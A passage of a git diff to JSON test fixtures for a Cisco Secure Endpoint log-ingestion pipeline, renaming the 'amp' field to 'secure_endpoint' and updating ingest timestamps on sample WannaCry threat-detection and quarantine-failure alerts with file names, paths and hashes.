21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -7354,7 +7354,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -7432,7 +7432,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510498746Z",
+                "ingested": "2021-09-27T00:41:33.421094070Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":876000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -7443,7 +7443,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -7521,7 +7521,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510500626Z",
+                "ingested": "2021-09-27T00:41:33.421095862Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":845000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -7532,7 +7532,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -7610,7 +7610,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510506069Z",
+                "ingested": "2021-09-27T00:41:33.421097648Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":798000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -7621,7 +7621,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -7699,7 +7699,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510508336Z",
+                "ingested": "2021-09-27T00:41:33.421099458Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":767000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -7710,7 +7710,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -7788,7 +7788,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510510239Z",
+                "ingested": "2021-09-27T00:41:33.421101247Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -7799,7 +7799,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -7877,7 +7877,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510512116Z",
+                "ingested": "2021-09-27T00:41:33.421103055Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":735000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -7888,7 +7888,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -7969,7 +7969,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510513970Z",
+                "ingested": "2021-09-27T00:41:33.421104837Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -7980,7 +7980,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -8058,7 +8058,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510515850Z",
+                "ingested": "2021-09-27T00:41:33.421106624Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -8069,7 +8069,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
diff --git a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log-expected.json b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log-expected.json
index e0b337505a5..c0d626f912f 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log-expected.json
+++ b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log-expected.json
@@ -51,7 +51,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111129724Z",
+                "ingested": "2021-09-27T00:41:58.139816175Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":96000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -62,7 +62,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -128,7 +128,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111134931Z",
+                "ingested": "2021-09-27T00:41:58.139820693Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":862000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -138,7 +138,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -203,7 +203,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111137209Z",
+                "ingested": "2021-09-27T00:41:58.139822625Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":659000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -213,7 +213,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -290,7 +290,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111139358Z",
+                "ingested": "2021-09-27T00:41:58.139824393Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":831000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -301,7 +301,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -388,7 +388,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111141503Z",
+                "ingested": "2021-09-27T00:41:58.139826150Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":706000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -399,7 +399,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -490,7 +490,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111143609Z",
+                "ingested": "2021-09-27T00:41:58.139827934Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat 